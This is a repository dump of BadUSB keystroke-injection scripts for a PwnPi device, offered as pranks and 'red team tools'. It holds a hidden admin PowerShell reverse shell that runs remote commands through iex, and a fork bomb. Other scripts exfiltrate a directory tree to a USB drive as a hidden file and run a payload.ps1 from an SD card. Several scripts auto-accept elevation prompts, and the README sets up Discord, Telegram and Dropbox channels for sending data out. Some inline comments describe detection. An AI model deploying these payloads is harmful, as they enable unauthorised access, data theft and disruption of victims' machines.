// start Powershell script 90 | press("GUI r"); 91 | delay(1000); 92 | type("powershell -NoP -NonI -Exec Bypass -C $env:temp;sleep 1;Start txtlog.ps1;sleep 1;exit"); 93 | delay(200); 94 | press("ENTER"); 95 | delay(3000); 96 | press("ALT y"); -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PwnPi-Scripts 2 | 3 | ![pwnpiOLED](https://github.com/beigeworm/PwnPi-Scripts/assets/93350544/0bb4f5b5-6549-49da-ac7d-72fc6ee1e2f6) 4 | 5 | **A collection of BadUSB scripts for the PwnPi A.L.O.A.** 6 | These scripts range from harmless pranks to nefarious red team tools. For educational purposes only. 7 | 8 | # Pre-Deployment Setup 9 | Most of these scripts will require some setup before they will work. 10 | Make sure to read through all the scripts and follow any setup instructions. 11 | 12 | eg. `replace DISCORD_WEBHOOK to your webhook.` etc.. 13 | 14 | **Setup for Telegram, Discord, Dropbox** 15 | 16 | **DROPBOX ACCESS TOKEN SETUP** 17 | 1. make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 18 | 2. generate an access token for your app. 19 | 20 | **DISCORD WEBHOOK SETUP** 21 | 1. (Server Admin Required) On a discord server chat goto > "edit channel" > "integrations" > "webhooks" 22 | 2. make a new webhook, name it and then click "copy webhook URL". 23 | 24 | **TELEGRAM BOT SETUP** 25 | 1. visit https://t.me/botfather and make a bot. 26 | 2. add bot api to script. 27 | 3. search for bot in top left box in telegram and start a chat then type /start. 28 | 4. 
add the chat ID for the chat bot (use the snippet below to find the chat ID) 29 | 30 | `$token='YOUR_TOKEN' #Replace this with your bot Token 31 | $URL='https://api.telegram.org/bot{0}' -f $Token 32 | $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop 33 | $inMessage.result.message | write-output 34 | $inMessage.result.message | get-member` 35 | 36 | # If you like my work please leave a star. ⭐ 37 | -------------------------------------------------------------------------------- /Real-Fork-Bomb.js: -------------------------------------------------------------------------------- 1 | layout('us'); 2 | delay(500); 3 | press("GUI r"); 4 | delay(1500); 5 | type("cmd"); 6 | delay(200) 7 | press("CTRL SHIFT ENTER"); 8 | delay(2000); 9 | press("ALT y"); 10 | delay(2500); 11 | type("MODE CON: COLS=15 LINES=1") 12 | delay(100); 13 | press("ENTER"); 14 | delay(500); 15 | type("COLOR EF") 16 | delay(100); 17 | press("ENTER"); 18 | type("for /l %x in (0,0,0) do start") 19 | delay(100); 20 | press("ENTER"); -------------------------------------------------------------------------------- /RickRoll-Max-Vol.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: RickRoll with Max Volume Spam 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: start a RickRoll with a .vbs that spams the Volume UP button. 
5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | 14 | // Script Setup 15 | layout('us'); 16 | // typingSpeed(1,1); 17 | 18 | // Main Payload 19 | press("GUI r"); 20 | delay(500); 21 | type("powershell -NoP -NonI -Exec Bypass"); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | 28 | type("copy con volup.vbs"); 29 | press("ENTER"); 30 | type ("do"); 31 | press("ENTER"); 32 | type("Set WshShell = CreateObject(\"WScript.Shell\")"); 33 | press("ENTER"); 34 | type("WshShell.SendKeys(chr(&hAF))"); 35 | press("ENTER"); 36 | type("WScript.Sleep 10"); 37 | press("ENTER"); 38 | type("loop"); 39 | press("ENTER"); 40 | press("CTRL z"); 41 | press("ENTER"); 42 | type("start volup.vbs"); 43 | press("ENTER"); 44 | delay(1000); 45 | type("exit"); 46 | press("ENTER"); 47 | delay(1000); 48 | press("GUI r"); 49 | delay(1000); 50 | type("msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ"); 51 | press("ENTER"); 52 | delay(3000); 53 | press("f"); 54 | -------------------------------------------------------------------------------- /Run File from SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Run .ps1 From SD card. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Run any .ps1 file from the SD card. 
5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRED] 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | // assurePS32: types a check of [IntPtr]::Size and, when it is not 4, starts the SysWOW64 powershell.exe inside the current console. 27 | function assurePS32() { 28 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 29 | delay(1000); 30 | } 31 | assurePS32(); // open a 32bit console, if the current one is 64bit 32 | delay(2000); // The command typed next looks up the volume labelled RECOVERY through WMI (gwmi win32_volume) and runs payload.ps1 from its root in a minimised SysWOW64 PowerShell started with -exec Bypass. Removable-media device control and PowerShell script block logging are the controls that cover this step. 33 | type("cmd /C start /MIN $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec Bypass .((gwmi win32_volume -f 'label=''RECOVERY''').Name+'\\payload.ps1')") 34 | delay(1000); 35 | press("ENTER") -------------------------------------------------------------------------------- /Set-US-Keyboard.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Set System Language to US 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Set System Language and keyboard to US. 
5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload: after the PowerShell launch sequence, types Dism /online /Get-Intl, Set-WinSystemLocale en-US and Set-WinUserLanguageList en-US -Force, then exit. 18 | press("GUI r"); 19 | delay(1500); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2500); 24 | press("ALT y"); 25 | press("left"); 26 | delay(4000); 27 | press("ENTER"); 28 | type("Dism /online /Get-Intl"); 29 | press("ENTER") 30 | delay(4000); 31 | type("Set-WinSystemLocale en-US"); 32 | press("ENTER") 33 | delay(500); 34 | type("Set-WinUserLanguageList en-US -Force"); 35 | press("ENTER") 36 | delay(1500); 37 | type('exit'); 38 | press("ENTER"); 39 | delay(3500); -------------------------------------------------------------------------------- /Simple Netcat Client.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Simple NetCat Client 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRED] 10 | 11 | // *REQUIREMENTS* 12 | // you will need a Microsoft Outlook Email address for this to work 13 | // NOTE(review): the REQUIREMENTS and SETUP lines mention an e-mail account and $runtime, but the PowerShell typed by this script opens a TCP connection and uses neither; they look carried over from another script. 14 | // *SETUP* 15 | // replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) 16 | // set $runtime=1 to desired interval between emails (in minutes). Default is 1 minute. 
17 | 18 | // ============================================================================= 19 | 20 | // script setup 21 | layout("us") 22 | 23 | // Open Powershell as Admin 24 | press("GUI r"); 25 | delay(1000); 26 | type("powershell -NoP -NonI -W Hidden -Exec Bypass"); 27 | delay(500); 28 | press("CONTROL SHIFT ENTER"); 29 | delay(3000); 30 | press("ALT y"); 31 | delay(4000); 32 | 33 | // Main Powershell code: connects to the configured host on TCP port 4444, passes whatever text arrives to iex and writes the output plus a prompt back on the same socket. The outer do/while never ends ($v stays 4), so the client reconnects after a 10 second sleep. Detection: a powershell.exe started with -W Hidden that holds a long-lived outbound TCP connection, and script block logging, which records each command handed to iex. 34 | type("do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt(\"YOUR_IP_OR_DOMAIN_HERE\",4444)"); 35 | press("ENTER"); 36 | delay(500); 37 | type(";$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)"); 38 | press("ENTER"); 39 | delay(500); 40 | type(";$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)"); 41 | press("ENTER"); 42 | delay(500); 43 | -------------------------------------------------------------------------------- /Tree-of-Knowledge.js: -------------------------------------------------------------------------------- 1 | layout('us'); 2 | delay(500); 3 | press("GUI r"); 4 | delay(1500); // The cmd line typed next changes to %userprofile%, finds the drive letter of the volume whose label matches EXFIL through wmic and writes a one-line echotree.cmd; the second typed line runs it, redirects the tree listing to a file named after the computer on that volume, marks the file hidden and exits. Removable-storage write auditing covers this. 5 | type("cmd /k \"mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr \"EXFIL\"') do set myd=%d&echo tree /a /f > echotree.cmd\""); 6 | delay(200) 7 | press("ENTER"); 8 | delay(2500); 9 | type("echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit") 10 | delay(100); 11 | press("ENTER"); 12 | press("ALT SPACE"); 13 | type("n") -------------------------------------------------------------------------------- /Windows-93_slow.js: -------------------------------------------------------------------------------- 1 | 2 | // ============================================================================= 3 | // Title: Start 
Windows93 4 | // Author: @beigeworm | https://github.com/beigeworm 5 | // Description: Start Windows93 through a browser and fullscreen. 6 | // Target: Windows 10 7 | // ============================================================================= 8 | 9 | // *USB SETTING* 10 | // startup 11 | 12 | // ============================================================================= 13 | 14 | // Script Setup 15 | layout('us'); 16 | // typingSpeed(1,1); 17 | 18 | // Main Payload: opens cmd through the Run dialog with CTRL SHIFT ENTER and ALT y, force-kills msedge.exe together with its child processes (taskkill /F /IM msedge.exe /T), exits, then starts msedge.exe in a new kiosk window on www.windows93.net and sends F11. 19 | delay(500); 20 | press("GUI r"); 21 | delay(1500); 22 | type("cmd"); 23 | delay(200) 24 | press("CTRL SHIFT ENTER"); 25 | delay(2000); 26 | press("ALT y"); 27 | delay(2500); 28 | type("taskkill /F /IM msedge.exe /T > nul") 29 | delay(100); 30 | press("ENTER"); 31 | delay(500); 32 | type("exit") 33 | delay(100); 34 | press("ENTER"); 35 | delay(2000); 36 | press("GUI r"); 37 | delay(1500); 38 | type("msedge.exe --new-window -kiosk www.windows93.net"); 39 | delay(200) 40 | press("ENTER"); 41 | delay(1500); 42 | press("F11"); --------------------------------------------------------------------------------